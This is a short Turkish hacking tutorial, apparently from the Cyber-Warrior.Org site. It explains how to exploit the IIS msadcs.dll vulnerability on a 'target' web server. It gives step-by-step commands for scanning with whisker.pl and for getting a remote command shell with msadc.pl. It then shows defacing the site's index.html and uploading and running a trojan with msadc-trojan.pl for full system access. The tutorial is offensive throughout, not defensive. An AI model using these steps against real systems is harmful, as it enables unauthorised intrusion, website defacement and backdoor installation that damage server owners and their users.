MS Web Server IIS msadcs.dll Açigi,

msadcs açigini iyi bir port scanner ile yada Cgi scanner ile rahatça tespit edebilirsiniz
Default olarak kurulan çogu sistemlerde bu açik vardir.

Cgi Scanner olarak Perl Tabanli Wisker yada N-Stealth kullanabilirsiniz.(illegalport download bölümden indirebilirsiniz)
Port Scanner Olarak GFI Lan Gurar Network Scanner’i Kullanabilirsiniz (download bölümünden indirebilirsiniz.)
Ve Exploit’imiz "Msadcs.pl", whisker.pl ve Trojan’imiz "msadc-trojan.pl" Dos Tabanli Olarak Saldiracagiz ve Perl kullanacagiz.

Uygulama:

whisker.pl’yi c:’deki Perl klasörü içindeki Bin’e atiyoruz. Dos Komut Satirina Geçip
C:\perl\Bin>perl whisker.pl -h hedefimiz.com yaziyoruz (Enter)hedefimiz.com yerine ip adreside
Yazabiliriz.

Sistemde msadcs açigi vara;

+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll

Perl böyle bir Mesaj Verecektir.
Açigi Bulduk, msadc.pl exploitimizi yine PerlBin klasörüne atiyoruz
Tekrar Komuta Satirina Dönüp
C:\perl\Bin>perl msadc.pl -h hedefimiz.com (yada ip adresini) yaziyoruz. (Enter)

Karsiniza cmd.exe’yi çalistirmak için gerekli komu satiri çikacak
Artik sistemdeyiz.
IIs’de Genelde site c:Inetpubwwwroot klasöründe bulunur. Kendi ISS Web Server’inizda Deneyebilirsiniz.
cmd cecho Bu Site Hacklendi> C:\Inetpub\wwwroot\index.html
Success...!

Yine Devam Edebiliriz,
Daha Trojan’inimz var Elimizde (msadc-trojan.pl) Ayni Seklide Perlin Klasörüne atiyoruz
C:\perl\Bin>perl msadc-trojan.plhedefimiz.com localip trojan.exe yaziyoruz
Trojanin Karsi Tarafa upload edildigine dair bir mesaj çikacak
(done. uploaded and ran If all went well, you should be able to use the trojan to connect)
Artik tüm Sisteme Girmeye Yetkimiz Var..!

Adi Geçen Tüm Dosyalar Sitemiz Download Bölümünden indirebilirsiniz.

CWDoktoray / Cyber-Warrior.Org